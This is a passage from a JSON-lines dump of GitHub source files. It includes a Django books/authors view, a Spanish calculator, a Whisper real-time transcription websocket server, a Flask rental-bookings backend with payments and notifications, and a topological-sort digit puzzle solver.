Autor.objects.create(first_name=request.POST[\"first_name\"],last_name=request.POST[\"last_name\"],notas=request.POST[\"notes\"])\n return redirect('/author')\n\n\ndef authors(request,idauthor):\n request.session[\"idauthor\"] = idauthor\n autor = Autor.objects.get(id=idauthor)\n filtered_entry = Libro.objects.all()\n for exclude_entry in autor.libros.all():\n filtered_entry = filtered_entry.exclude(id=exclude_entry.id)\n context = {\n \"autores\" : autor,\n \"books\" : filtered_entry\n }\n return render(request,'author.html',context)\n\ndef addNewBook(request):\n if request.method == 'GET':\n idauthor = request.session[\"idauthor\"]\n if request.GET[\"book\"] != \"0\":\n idauthor = request.session[\"idauthor\"]\n Libro.objects.get(id=request.GET[\"book\"]).autores.add(Autor.objects.get(id=idauthor))\n 
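# ManyToMany .add() persists the relation immediately, so no explicit save() call is needed here\n            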
return redirect(f'author/{idauthor}')\n else:\n messages.info(request,\"No se ha seleccionado ningun libro\")\n return redirect(f'author/{idauthor}')\n ","repo_name":"eorozco-c/Books_Authors","sub_path":"apps/books_authors_app/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2561,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"15863740505","text":"\r\n\r\ndef suma ():\r\n resultado = float(op1)+float(op2)\r\n return resultado\r\n\r\ndef resta ():\r\n resultado = float(op1)-float(op2)\r\n return resultado\r\n\r\ndef multiplicacion ():\r\n resultado = float(op1)*float(op2)\r\n return resultado\r\n\r\ndef division ():\r\n if (op2 != \"0\"):\r\n resultado = float(op1)/float(op2)\r\n return resultado\r\n else : \r\n print (\"Operacion no válida\")\r\n\r\ndef exponencial ():\r\n resultado = float(op1)**float(op2)\r\n return resultado\r\n\r\nop1 = \"\"\r\nwhile (op1 != \"q\"):\r\n print(\"\"\"\r\n\r\n CALCULADORA\r\n Las operaciones disponibles son las siguientes:\r\n\r\n Suma (+)\r\n Resta (-)\r\n Multiplicacion(*)\r\n Divison(/)\r\n Exponenciales (^)\r\n Raiz cuadrada (por favor, siga el formato: operador = ^ y segundo operando = 0.5)\r\n\r\n Pulse q para salir de la aplicacion\r\n \"\"\")\r\n try:\r\n op1 = input(\"Introduzca el primer operando: \")\r\n if (op1 == \"q\"):\r\n break\r\n oper = input (\"Introduzca el operador: \")\r\n op2 = input (\"Introduzca el segundo operando: \")\r\n\r\n float(op1)\r\n float(op2)\r\n except:\r\n print(\"Operando incorrecto\")\r\n continue\r\n \r\n if (oper== str(\"+\")) :\r\n res = suma()\r\n elif (oper== str(\"-\")) :\r\n res = resta()\r\n elif (oper== str(\"*\")) :\r\n res = multiplicacion()\r\n elif (oper== str(\"/\")) :\r\n res = division ()\r\n elif (oper== str(\"^\")) : \r\n res = exponencial()\r\n else :\r\n print(\"Operacion no soportada/Operador no válido\")\r\n\r\n if res != None : \r\n print (\"El resultado de la operacion \" + op1 + oper + op2 + \" es \" + str(res))\r\n\r\n\r\n\r\n\r\n\r\n","repo_name":"LuzJP/BecasDevNet","sub_path":"calculadora.py","file_name":"calculadora.py","file_ext":"py","file_size_in_byte":1701,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"2252700972","text":"import time\nimport sounddevice as sd\nimport numpy as np\n\nimport whisper\n\nimport asyncio\nimport queue\nimport sys\n\nimport websockets\nimport socket\nfrom threading import Thread, Event\nfrom collections import deque\n\nserver_host = '127.0.0.1'\nserver_port = 8081\n\n# SETTINGS\n# the model used for transcription. https://github.com/openai/whisper#available-models-and-languages\nMODEL_TYPE=\"tiny.en\"\n\n# pre-set the language to avoid autodetection\nLANGUAGE=\"English\"\n\n# this is the base chunk size the audio is split into in samples. 
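For example, the default BLOCKSIZE of 24678 samples at 16 kHz is roughly 1.54 seconds of audio per chunk, since 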
blocksize / 16000 = chunk length in seconds.\nBLOCKSIZE=24678\n\n# should be set to the lowest sample amplitude that the speech in the audio material has\nSILENCE_THRESHOLD=1000\n\n# number of samples in one buffer that are allowed to be higher than threshold\nSILENCE_RATIO=2\n\nHAS_DATA_WAITING=False\n\nFIRST_RUN=True\n\nDEBUG=False\n\nlatest_data = \"\"\n\nglobal_ndarray = None\nmodel = whisper.load_model(MODEL_TYPE)\n\nfrom collections import deque\n\nprint(\"Starting server...\")\n\nif DEBUG:\n\tprint(\"Silence threshold division\", SILENCE_THRESHOLD/15)\n\nasync def inputstream_generator():\n\t\"\"\"Generator that yields blocks of input data as NumPy arrays.\"\"\"\n\tq_in = asyncio.Queue()\n\tloop = asyncio.get_event_loop()\n\n\tdef callback(indata, frame_count, time_info, status):\n\t\tloop.call_soon_threadsafe(q_in.put_nowait, (indata.copy(), status))\n\n\tstream = sd.InputStream(samplerate=16000, channels=1, dtype='int16', blocksize=BLOCKSIZE, callback=callback)\n\twith stream:\n\t\twhile True:\n\t\t\tindata, status = await q_in.get()\n\t\t\tyield indata, status\n\n\nasync def process_audio_buffer():\n\tglobal global_ndarray\n\tglobal HAS_DATA_WAITING\n\tglobal latest_data\n\tasync for indata, status in inputstream_generator():\n\n\t\tindata_flattened = abs(indata.flatten())\n\n\t\tif DEBUG:\n\t\t\tprint(\"\\nConcatenated buffers:\", np.average((indata_flattened[-100:-1])))\n\n\t\t# discard buffers that contain mostly silence\n\t\tif(np.asarray(np.where(indata_flattened > SILENCE_THRESHOLD)).size < SILENCE_RATIO) and not HAS_DATA_WAITING:\n\t\t\tif DEBUG:\n\t\t\t\tprint(\"\\nFlattened:\", np.asarray(np.where(indata_flattened > SILENCE_THRESHOLD)).size, \"Queued:\", HAS_DATA_WAITING)\n\t\t\tcontinue\n\n\t\tif (global_ndarray is not None):\n\t\t\tglobal_ndarray = np.concatenate((global_ndarray, indata), dtype='int16')\n\t\telse:\n\t\t\tglobal_ndarray = indata\n\n\t\t# concatenate buffers if the end of the current buffer is not silent\n\t\tif (np.average((indata_flattened[-100:-1])) > SILENCE_THRESHOLD/15):\n\t\t\tprint(\"Recording audio, waiting for silence...\")\n\t\t\tif DEBUG:\n\t\t\t\tprint(\"\\nStill waiting for silence, concatenating...\")\n\t\t\t\tprint(\"Average:\", np.average((indata_flattened[-100:-1])))\n\t\t\tHAS_DATA_WAITING = True\n\t\t\tcontinue\n\t\telse:\n\t\t\tHAS_DATA_WAITING = False\n\t\t\tprint(\"\\nTranscribing...\")\n\t\t\tstart_time = time.perf_counter()\n\t\t\tlocal_ndarray = global_ndarray.copy()\n\t\t\tglobal_ndarray = None\n\t\t\tindata_transformed = local_ndarray.flatten().astype(np.float32) / 32768.0\n\t\t\tresult = model.transcribe(indata_transformed, language=LANGUAGE)\n\t\t\tprint(\"Output:\", result[\"text\"])\n\t\t\tlatest_data = result[\"text\"]\n\t\t\tend_time = time.perf_counter()\n\t\t\tprint(f\"Transcribed in {end_time - start_time:0.4f} seconds\\n\")\n\n\t\tdel local_ndarray\n\t\tdel indata_flattened\n\n\n\nasync def main():\n\tprint('\\nActivating wire...\\n')\n\n\taudio_task = asyncio.create_task(process_audio_buffer())\n\n\twhile True:\n\t\tawait asyncio.sleep(1)\n\taudio_task.cancel()\n\ttry:\n\t\tawait audio_task\n\texcept asyncio.CancelledError:\n\t\tprint('\\nwire was cancelled')\n\nif __name__ == \"__main__\":\n\tasync def stt_server(websocket, path):\n\t\tglobal latest_data\n\t\twhile True:\n\t\t\t\tawait websocket.send(latest_data)\n\n\tdef start_loop(loop, server):\n\t\tloop.run_until_complete(server)\n\t\tloop.run_forever()\n\n\tnew_loop = asyncio.new_event_loop()\n\tstart_server = websockets.serve(stt_server, server_host, 
server_port, loop=new_loop)\n\tt = Thread(target=start_loop, args=(new_loop, start_server))\n\tt.kill = Event()\n\tt.start()\n\ttime.sleep(2)\n\tprint(f\"Websocket server started at ws://localhost:{server_port}\")\n\n\ttry:\n\t\tasyncio.run(main())\n\texcept KeyboardInterrupt:\n\t\tsys.exit('\\nInterrupted by user')\n\t\tt.kill.set()\n\t\tt.join()\n","repo_name":"Zetaphor/whisper-realtime","sub_path":"openai-whisper-realtime.py","file_name":"openai-whisper-realtime.py","file_ext":"py","file_size_in_byte":4089,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"30915710989","text":"import requests\nimport datetime\nimport geopy.distance\nimport sys\n\nfrom math import floor\nfrom flask import Flask, request, make_response, jsonify\nfrom db_service import *\n\nfrom fcm_service import send_notification\nfrom tokens_service import save_token, reset_tokens, get_tokens\n\napp = Flask(__name__)\n\nconn = connect()\nset_db(conn, INIT_CMD)\n\ntry:\n payments_base_url = os.environ['PAYMENTS_URL']\nexcept KeyError:\n payments_base_url = 'https://payments-server-develop.herokuapp.com/'\n\n\n@app.route('/')\ndef hello():\n response = 'db: UP\\n'\n use_db(conn, 'SELECT NOW();')\n return response\n\n\n@app.route('/feedback', methods=['POST'])\ndef new_feedback():\n body = request.json\n if use_db(conn, count_bookings_query(body['post_id'], body['user_id']))[0] == 0:\n return make_response({\"error\": \"No puedes calificar este alojamiento si nunca reservaste ahi\"}, 400)\n feedback_id, post_id, user_id, date, comment, stars, = use_db(conn, add_feedback_query(body['user_id'],\n body['post_id'],\n body['date'],\n body.get('comment'),\n body.get('stars')\n ))\n return make_response(\n jsonify(\n feedback_id=feedback_id,\n post_id=post_id,\n user_id=user_id,\n date=date.strftime('%Y-%m-%d'),\n coment=comment,\n stars=stars\n )\n )\n\n\n@app.route('/feedback')\ndef get_feedbacks():\n user_id = request.args.get('user_id')\n post_id = request.args.get('post_id')\n date = request.args.get('date')\n mandatoryComment = request.args.get('mandatoryComment', False)\n mandatoryStars = request.args.get('mandatoryStars', False)\n feedbacks = []\n for feedback_id, post_id, user_id, date, comment, stars in use_db(conn, get_feedback_query(user_id,\n post_id,\n date,\n mandatoryComment == True,\n mandatoryStars == True\n ), many=True):\n feedbacks.append({'feedback_id': feedback_id, 'post_id': post_id,\n 'user_id': user_id, 'date': date.strftime('%Y-%m-%d'),\n 'comment': comment, 'stars': stars})\n return make_response(jsonify(feedbacks), 200)\n\n\n@app.route('/posts', methods=['DELETE'])\ndef reset_posts():\n set_db(conn, RESET_CMD)\n return make_response(\"DB Reseted\", 200)\n\n\n@app.route('/posts', methods=['POST'])\ndef new_post():\n body = request.json\n response = requests.post(payments_base_url + 'room',\n json={\"creatorId\": body['wallet_id'], \"price\": body['price']},\n headers={'Content-Type': 'application/json'})\n\n if response.status_code == 200:\n print('new room: ', response.json()['roomTransaction'])\n roomTransaction = response.json()['roomTransaction']\n body['room_transaction'] = roomTransaction\n post_id, availability_dates, availability_type, bathrooms, bedrooms, beds, beds_distribution, date, description, guests, images, is_blocked, location, price, services, title, type, user_id, wallet_id, room_transaction, = use_db(\n conn, add_post_query(body))\n return make_response(\n jsonify(id=post_id, user_id=user_id, price=price, 
date=date.strftime('%Y-%m-%d'), is_blocked=is_blocked,\n type=type, title=title, description=description, availability_dates=availability_dates,\n availability_type=availability_type,\n bathrooms=bathrooms, bedrooms=bedrooms, beds=beds, beds_distribution=beds_distribution,\n guests=guests, images=images,\n location=location, services=services, wallet_id=wallet_id, room_transaction=room_transaction), 201)\n\n\n@app.route('/posts/')\ndef visualize_post(post_id):\n post_id, availability_dates, availability_type, bathrooms, bedrooms, beds, beds_distribution, date, description, guests, images, is_blocked, location, price, services, title, type, user_id, wallet_id, room_transaction, = use_db(\n conn, get_post_query(post_id))\n return make_response(\n jsonify(id=post_id, user_id=user_id, price=price, date=date.strftime('%Y-%m-%d'), is_blocked=is_blocked,\n type=type, title=title, description=description, availability_dates=availability_dates,\n availability_type=availability_type,\n bathrooms=bathrooms, bedrooms=bedrooms, beds=beds, beds_distribution=beds_distribution, guests=guests,\n images=images,\n location=location, services=services, wallet_id=wallet_id, room_transaction=room_transaction), 200)\n\n\n@app.route('/posts/', methods=['PATCH'])\ndef edit_post(post_id):\n body = request.json\n body.pop(\"id\", None)\n if body.get('price'):\n roomTransaction = use_db(conn, get_post_transaction_query(post_id))[0]\n owner_w_id = use_db(conn, get_post_owner_wallet_id_query(post_id))[0]\n response = requests.patch(payments_base_url + 'room',\n json={'wallet_id': owner_w_id, 'room_transaction': roomTransaction,\n 'price': body.get('price')})\n if response.status_code != 200:\n return make_response(response.content, 500)\n post_id, availability_dates, availability_type, bathrooms, bedrooms, beds, beds_distribution, date, description, guests, images, is_blocked, location, price, services, title, type, user_id, wallet_id, room_transaction, = use_db(\n conn, edit_post_cmd(post_id, **body))\n return make_response(\n jsonify(id=post_id, user_id=user_id, price=price, date=date.strftime('%Y-%m-%d'), is_blocked=is_blocked,\n type=type, title=title, description=description, availability_dates=availability_dates,\n availability_type=availability_type,\n bathrooms=bathrooms, bedrooms=bedrooms, beds=beds, beds_distribution=beds_distribution, guests=guests,\n images=images,\n location=location, services=services,\n wallet_id=wallet_id, room_transaction=room_transaction, status=\"ok\"), 201)\n\n\n@app.route('/posts/', methods=['DELETE'])\ndef delete_post(post_id):\n roomTransaction = use_db(conn, get_post_transaction_query(post_id))[0]\n owner_w_id = use_db(conn, get_post_owner_wallet_id_query(post_id))[0]\n response = requests.delete(payments_base_url + 'room',\n json={'room_transaction': roomTransaction, 'wallet_id': owner_w_id})\n if response.status_code != 200:\n return make_response(response.content, 500)\n post_id, availability_dates, availability_type, bathrooms, bedrooms, beds, beds_distribution, date, description, guests, images, is_blocked, location, price, services, title, type, user_id, wallet_id, room_transaction, = use_db(\n conn, delete_post_query(post_id))\n return make_response(\n jsonify(id=post_id, user_id=user_id, price=price, date=date.strftime('%Y-%m-%d'), is_blocked=is_blocked,\n type=type, title=title, description=description, availability_dates=availability_dates,\n availability_type=availability_type,\n bathrooms=bathrooms, bedrooms=bedrooms, beds=beds, beds_distribution=beds_distribution, 
guests=guests,\n images=images,\n location=location, services=services,\n wallet_id=wallet_id, room_transaction=room_transaction), 200)\n\ndef get_posts_query_wrapper(user_id, type, minPrice, maxPrice, bodyBeginDate, bodyEndDate, lng, lat, hide_user_id ,maxDistance, includeBlocked):\n posts = use_db(conn, get_posts_query(user_id, type, minPrice, maxPrice, hide_user_id), many=True)\n parsed_posts = []\n for post_id, availability_dates, availability_type, bathrooms, bedrooms, beds, beds_distribution, date, description, guests, images, is_blocked, location, price, services, title, type, user_id, wallet_id, room_transaction, in posts:\n closeEnough = True\n if lng and lat:\n maxDistance = float(maxDistance) if maxDistance else 100.0\n postCoords = (float(location['lng']), float(location['lat']))\n searchCoords = (float(lng), float(lat))\n distance = geopy.distance.geodesic(postCoords, searchCoords).km\n closeEnough = distance <= maxDistance\n overlap = False\n availableRoom = True\n if bodyBeginDate and bodyEndDate:\n overlap, = use_db(conn, overlapping_bookings_count_query(post_id, bodyBeginDate, bodyEndDate))\n avBeginDate = datetime.datetime.strptime(availability_dates['start_date'], '%Y-%m-%d')\n avEndDate = datetime.datetime.strptime(availability_dates['end_date'], '%Y-%m-%d')\n beginDate = datetime.datetime.strptime(bodyBeginDate, '%Y-%m-%d')\n endDate = datetime.datetime.strptime(bodyEndDate, '%Y-%m-%d')\n availableRoom = avBeginDate <= beginDate <= avEndDate and avBeginDate <= endDate <= avEndDate\n if not overlap and availableRoom and closeEnough and (not is_blocked or includeBlocked):\n parsed_posts.append({\"id\": post_id, \"user_id\": user_id, \"price\": price, \"date\": date.strftime('%Y-%m-%d'),\n \"is_blocked\": is_blocked, \"type\": type, \"title\": title, \"description\": description,\n \"availability_dates\": availability_dates, \"availability_type\": availability_type,\n \"bathrooms\": bathrooms, \"bedrooms\": bedrooms, \"beds\": beds,\n \"beds_distribution\": beds_distribution, \"recommended\" : False,\n \"guests\": guests, \"images\": images, \"location\": location,\n \"services\": services, \"wallet_id\": wallet_id, \"room_transaction\": room_transaction})\n return parsed_posts\n\ndef loose_filters(minPrice, maxPrice, beginDate, endDate, maxDistance):\n loosenMinPrice = None\n loosenMaxPrice = None\n loosenBeginDate = None\n loosenEndDate = None\n loosenMaxDistance = None\n if beginDate and endDate:\n beginDate = datetime.datetime.strptime(beginDate, '%Y-%m-%d')\n endDate = datetime.datetime.strptime(endDate, '%Y-%m-%d')\n diffDays = (endDate - beginDate).days\n loosenBeginDate = beginDate + datetime.timedelta(days=floor(diffDays/5))\n loosenEndDate = endDate - datetime.timedelta(days=floor(diffDays/5))\n loosenBeginDate = loosenBeginDate.strftime('%Y-%m-%d')\n loosenEndDate = loosenEndDate.strftime('%Y-%m-%d')\n if maxDistance:\n loosenMaxDistance = maxDistance * 2\n if minPrice:\n loosenMinPrice = float(minPrice) * 0.75\n if maxPrice:\n loosenMaxPrice = float(maxPrice) * 1.25\n return loosenMinPrice, loosenMaxPrice, loosenBeginDate, loosenEndDate, loosenMaxDistance\n\n\n@app.route('/posts')\ndef search_posts():\n user_id = request.args.get('user_id')\n type = request.args.get('type')\n if type: type = type.lower()\n minPrice = request.args.get('minPrice')\n maxPrice = request.args.get('maxPrice')\n bodyBeginDate = request.args.get('beginDate')\n bodyEndDate = request.args.get('endDate')\n lng = request.args.get('lng')\n lat = request.args.get('lat')\n maxDistance = 
request.args.get('maxDistance')\n hide_user_id = request.args.get('hide_user_id')\n includeRecommendations = request.args.get('includeRecommendations', False)\n includeBlocked = bool(request.args.get('includeBlocked', False))\n searchPosts = get_posts_query_wrapper(\n user_id, type, minPrice, maxPrice, bodyBeginDate, bodyEndDate, lng, lat, hide_user_id, maxDistance, includeBlocked\n )\n post_ids = request.args.get('post_ids')\n if post_ids:\n searchPosts = [post for post in searchPosts if str(post.get('id')) in post_ids.split(',')]\n recommendedPosts = []\n if bool(includeRecommendations):\n minPrice, maxPrice, bodyBeginDate, bodyEndDate, maxDistance = loose_filters(\n minPrice, maxPrice, bodyBeginDate, bodyEndDate, maxDistance\n )\n withRecommendedPosts = get_posts_query_wrapper(\n user_id, type, minPrice, maxPrice, bodyBeginDate, bodyEndDate, lng, lat, hide_user_id, maxDistance, includeBlocked\n )\n recommendedPosts = [post for post in withRecommendedPosts if post not in searchPosts]\n for post in recommendedPosts:\n post[\"recommended\"] = True\n print(\"Searched: \", len(searchPosts), \" Recommended: \", len(recommendedPosts))\n return make_response(jsonify(searchPosts + recommendedPosts), 200)\n\n\n@app.route('/bookings', methods=['GET'])\ndef get_bookings():\n guest_user_id = request.args.get('guest_user_id')\n user_id = request.args.get('user_id')\n post_id = request.args.get('post_id')\n status = request.args.get('status')\n booking_id = request.args.get('booking_id')\n bookings = use_db(conn, get_bookings_query(guest_user_id, user_id, post_id, status, booking_id), many=True)\n parsed_bookings = []\n for b_id, u_id, w_id, gu_id, gw_id, p_id, status, tx, res_tx, begin_date, end_date, creation_date in bookings:\n parsed_bookings.append({\"booking_id\": b_id, \"user_id\": u_id, \"wallet_id\": w_id,\n \"guest_user_id\": gu_id, \"guest_wallet_id\": gw_id, \"post_id\": p_id, \"status\": status,\n \"transaction\": tx, \"response_transaction\": res_tx, \"creation_date\": creation_date.strftime('%Y-%m-%d'),\n \"begin_date\": begin_date.strftime('%Y-%m-%d'),\n \"end_date\": end_date.strftime('%Y-%m-%d')})\n return make_response(jsonify(parsed_bookings), 200)\n\n\n@app.route('/bookings', methods=['POST'])\ndef new_booking():\n body = request.json\n # TODO Validar availavility\n roomTransaction = use_db(conn, get_post_transaction_query(body['post_id']))[0]\n beginDate = datetime.datetime.strptime(body['begin_date'], '%Y-%m-%d')\n endDate = datetime.datetime.strptime(body['end_date'], '%Y-%m-%d')\n response = requests.post(payments_base_url + 'booking', json={\"wallet_id\": body['wallet_id'],\n \"room_transaction\": roomTransaction,\n \"day\": beginDate.day,\n \"month\": beginDate.month,\n \"year\": beginDate.year,\n \"end_day\": endDate.day,\n \"end_month\": endDate.month,\n \"end_year\": endDate.year})\n if response.status_code == 200:\n host_id = use_db(conn, get_user_id_of_post_query(body['post_id']))\n print(\"host_id:\", host_id)\n print('sarasa', str(host_id[0]))\n sys.stdout.flush()\n # TODO Notificar al host que intentaron reservar\n send_notification(str(host_id[0]), \"Intentaron reservar tu alojamiento\",\n \"Desde el \" + str(beginDate) + \" hasta el \" + str(endDate))\n b_id, u_id, w_id, gu_id, gw_id, p_id, status, tx, res_tx, begin_date, end_date, creation_date, = use_db(conn,\n add_booking_query(\n body.get('host_user_id'),\n body.get('host_wallet_id'),\n body['user_id'],\n body['wallet_id'],\n body['post_id'],\n 'pending',\n response.json()[\n 'intentTransaction'],\n 
body['begin_date'],\n body['end_date']\n ))\n return make_response(\n jsonify(post_id=p_id, guest_user_id=gu_id, guest_wallet_id=gw_id, booking_id=b_id,\n begin_date=body['begin_date'], creation_date=creation_date.strftime('%Y-%m-%d'),\n end_date=body['end_date'], status=status, transaction=tx), 201)\n return make_response(response.content, 500)\n\n\n@app.route('/rejectance', methods=['POST'])\ndef reject_booking():\n body = request.json\n roomTransaction = use_db(conn, get_post_transaction_query(body['post_id']))[0]\n beginDate = datetime.datetime.strptime(body['begin_date'], '%Y-%m-%d')\n endDate = datetime.datetime.strptime(body['end_date'], '%Y-%m-%d')\n response = requests.post(payments_base_url + 'rejectance', json={\"wallet_id\": body['wallet_id'],\n \"guest_wallet_id\": body['guest_wallet_id'],\n \"room_transaction\": roomTransaction,\n \"day\": beginDate.day,\n \"month\": beginDate.month,\n \"year\": beginDate.year,\n \"end_day\": endDate.day,\n \"end_month\": endDate.month,\n \"end_year\": endDate.year})\n if response.status_code == 200:\n send_notification(body['guest_user_id'], \"Reservación rechazada\", \"Volvé a intentarlo\")\n b_id, u_id, w_id, gu_id, gw_id, p_id, status, tx, res_tx, begin_date, end_date, creation_date, = use_db(conn, respond_booking_query(\n body['user_id'],\n body['wallet_id'],\n 'rejected',\n response.json()['rejectTransaction'],\n body['end_date'],\n body['begin_date'],\n body['guest_wallet_id'],\n body['post_id']\n ))\n return make_response(\n jsonify(post_id=p_id, guest_user_id=gu_id, guest_wallet_id=gw_id, booking_id=b_id,\n begin_date=body['begin_date'], creation_date=creation_date.strftime('%Y-%m-%d'),\n user_id=u_id, wallet_id=w_id, end_date=body['end_date'], status=status, transaction=tx,\n rejectTrasaction=res_tx),\n 201)\n return make_response(response.content, 500)\n\n\n@app.route('/acceptance', methods=['POST'])\ndef accept_booking():\n body = request.json\n roomTransaction = use_db(conn, get_post_transaction_query(body['post_id']))[0]\n beginDate = datetime.datetime.strptime(body['begin_date'], '%Y-%m-%d')\n endDate = datetime.datetime.strptime(body['end_date'], '%Y-%m-%d')\n response = requests.post(payments_base_url + 'acceptance', json={\"wallet_id\": body['wallet_id'],\n \"guest_wallet_id\": body['guest_wallet_id'],\n \"room_transaction\": roomTransaction,\n \"day\": beginDate.day,\n \"month\": beginDate.month,\n \"year\": beginDate.year,\n \"end_day\": endDate.day,\n \"end_month\": endDate.month,\n \"end_year\": endDate.year})\n if response.status_code == 200:\n # TODO Notificar al guest que se acepto la reserva\n send_notification(body['guest_user_id'], \"Reservación confirmada\", \"¡Que disfrutes tu alojamiento!\")\n b_id, u_id, w_id, gu_id, gw_id, p_id, status, tx, res_tx, begin_date, end_date, creation_date, = use_db(conn,\n respond_booking_query(\n body['user_id'],\n body['wallet_id'],\n 'accepted',\n response.json()[\n 'acceptTransaction'],\n body['end_date'],\n body['begin_date'],\n body[\n 'guest_wallet_id'],\n body['post_id']\n ))\n acceptResponse = make_response(\n jsonify(post_id=p_id, guest_user_id=gu_id, guest_wallet_id=gw_id, booking_id=b_id,\n begin_date=body['begin_date'], creation_date=creation_date.strftime('%Y-%m-%d'),\n user_id=u_id, wallet_id=w_id, end_date=body['end_date'], status=status, transaction=tx,\n acceptTrasaction=res_tx), 201)\n overlappingBookings = use_db(conn,\n overlapping_bookings_query(body['post_id'], body['begin_date'], body['end_date']),\n many=True)\n for b_id, u_id, w_id, gu_id, gw_id, p_id, 
status, tx, res_tx, begin_date, end_date, creation_date in overlappingBookings:\n            response = requests.post(payments_base_url + 'rejectance', json={\"wallet_id\": body['wallet_id'],\n                                                                              \"guest_wallet_id\": gw_id,\n                                                                              \"room_transaction\": roomTransaction,\n                                                                              \"day\": begin_date.day,\n                                                                              \"month\": begin_date.month,\n                                                                              \"year\": begin_date.year,\n                                                                              \"end_day\": end_date.day,\n                                                                              \"end_month\": end_date.month,\n                                                                              \"end_year\": end_date.year})\n            if response.status_code == 200:\n                # TODO Notify the guest that their booking was rejected\n                send_notification(str(gu_id), \"Reservación rechazada\", \"Volvé a intentarlo\")\n                resValues = use_db(conn, respond_booking_query(\n                    body['user_id'],\n                    body['wallet_id'],\n                    'rejected',\n                    response.json()['rejectTransaction'],\n                    end_date,\n                    begin_date,\n                    gw_id,\n                    p_id\n                ))\n            else:\n                print(\"Rejection failed\", response.content)\n        return acceptResponse\n    return make_response(response.content, 500)\n\n\n# endpoint for internal testing\n@app.route('/notifications', methods=['POST'])\ndef notifications():\n    user_id = request.json['user_id']\n    msg_title = request.json['msg_title']\n    msg_body = request.json['msg_body']\n\n    result = send_notification(str(user_id), msg_title, msg_body)\n    print(result)\n\n    return make_response(result, 200)\n\n\n@app.route('/tokens', methods=['POST'])\ndef save_tokens():\n    save_token(request.json['user_id'], request.json['token_id'])\n    return make_response(\"{\\\"msg\\\" : \\\"ok\\\"}\", 201)\n\n\n@app.route('/posts/metrics')\ndef metrics_posts():\n    from_date = request.args.get('from_date')\n    to_date = request.args.get('to_date')\n    res = use_db(conn, count_posts_between_dates(from_date, to_date), many=True)\n    # `res is not []` compares identity and is always True; truthiness is the correct check\n    if res:\n        return make_response(json.dumps([{\"name\": row[0].strftime('%d-%m-%Y'), \"value\": row[1]} for row in res]), 200)\n    else:\n        print(\"no posts found\")\n        sys.stdout.flush()\n        return make_response(\"{\\\"msg\\\" : \\\"empty\\\"}\", 204)\n\n\n@app.route('/bookings/metrics')\ndef metrics_bookings():\n    from_date = request.args.get('from_date')\n    to_date = request.args.get('to_date')\n    res = use_db(conn, count_bookings_between_dates(from_date, to_date), many=True)\n    if res:\n        return make_response(json.dumps([{\"name\": row[0].strftime('%d-%m-%Y'), \"value\": row[1]} for row in res]), 200)\n    else:\n        print(\"no bookings found\")\n        sys.stdout.flush()\n        return make_response(\"{\\\"msg\\\" : \\\"empty\\\"}\", 204)\n\n\n@app.route('/tokens', methods=['DELETE'])\ndef delete_tokens():\n    reset_tokens()\n    return make_response(\"{\\\"msg\\\" : \\\"ok\\\"}\", 200)\n\n\n@app.route('/tokens')\ndef tokens():\n    return make_response(json.dumps(get_tokens()), 200)\n\n\nif __name__ == '__main__':\n    try:\n        app.run(port=os.environ['PORT'])\n    except KeyError:\n        app.run()\n    disconnect(conn)\n","repo_name":"fiuba-taller2-g3/posts-server","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":27344,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"9951682875","text":"import sys\n\n\nclass Graf:\n    def __init__(self, stevk): # constructor\n        # self.graf = defaultdict(list)\n        self.V = stevk\n        self.graf = {}\n        for i in range(self.V):\n            self.graf[i+1] = []\n\n        self.visited = []\n        self.queue = []\n        self.developing = []\n        self.cycle = False\n\n    def dodaj(self, od, do): # add an edge (od -> do)\n        self.graf[od].append(do)\n\n    def topo_sort(self): # run the algorithm\n        for u in self.graf:\n            if u not in self.visited:\n                self.razvij(u)\n        if self.cycle:\n            print(\"nemogoce\")\n            return -1\n\n  
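      # no cycle was found, so every vertex was prepended to self.queue only\n        # after all of its successors were expanded: a valid topological order\n        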
return self.queue\n\n    def razvij(self, u):\n        self.developing.append(u)\n        if self.cycle:\n            return\n\n        for v in self.graf[u]:\n            if v not in self.visited and v not in self.developing:\n                self.razvij(v)\n            elif v in self.developing:\n                self.cycle = True\n                break\n\n        self.queue.insert(0, u)\n        self.developing.remove(u)\n        self.visited.append(u)\n\n\ndef find_max_digit(i, g, max, queue):\n    index = queue[i]\n    if i >= g.V - 1:\n        return\n    for e in g.graf[index]:\n        if max[e-1] >= max[index - 1]:\n            max[e-1] = max[index - 1] - 1\n    find_max_digit(i + 1, g, max, queue)\n\n\ndef find_min_digit(i, g, queue, value=1):\n    tmp = value\n    for e in g.graf[i]:\n        new = find_min_digit(e, g, queue, value + 1)\n        if new > tmp:\n            tmp = new\n    return tmp\n\n\ndef find_numbers(q, graf):\n    max_num = [9] * graf.V\n    min_num = [1] * graf.V\n\n    for i in range(graf.V):\n        find_max_digit(i, graf, max_num, q)\n        min_num[q[i] - 1] = find_min_digit(q[i], graf, q)\n\n    if all(0 < i < 10 for i in max_num):\n        return max_num, min_num\n    else:\n        return -1, -1\n\n\nexamples = 0\ncount = 0\nconditions = 0\ngraph = None\nfor line in sys.stdin:\n    line = line.rstrip()\n    chars = line.split(\" \")\n    if examples == 0:\n        examples = int(line)\n        continue\n\n    if \">\" not in chars and \"<\" not in chars: # new graph\n        count = 0\n        graph = Graf(int(chars[0]))\n        conditions = int(chars[1])\n\n    elif \">\" in chars and count < conditions: # add an edge od -> do\n        count += 1\n        graph.dodaj(int(chars[0]), int(chars[2]))\n\n    elif \"<\" in chars and count < conditions: # add an edge do -> od\n        count += 1\n        graph.dodaj(int(chars[2]), int(chars[0]))\n\n    if count == conditions: # run the algorithm\n        count = 0\n        queue = graph.topo_sort()\n        if queue != -1:\n            max, min = find_numbers(queue, graph)\n            if max != -1 and min != -1:\n                max = map(str, max)\n                min = map(str, min)\n                # print(\"Min number: \" + ''.join(min))\n                # print(\"Max number: \" + ''.join(max))\n                print(''.join(min) + \" \" + ''.join(max))\n            else:\n                print(\"nemogoce\")\n","repo_name":"pseudobun/solo-projects","sub_path":"python_projects/topo_sort/topo_sort.py","file_name":"topo_sort.py","file_ext":"py","file_size_in_byte":2972,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"806629595","text":"# Producer and consumer\n# Producer 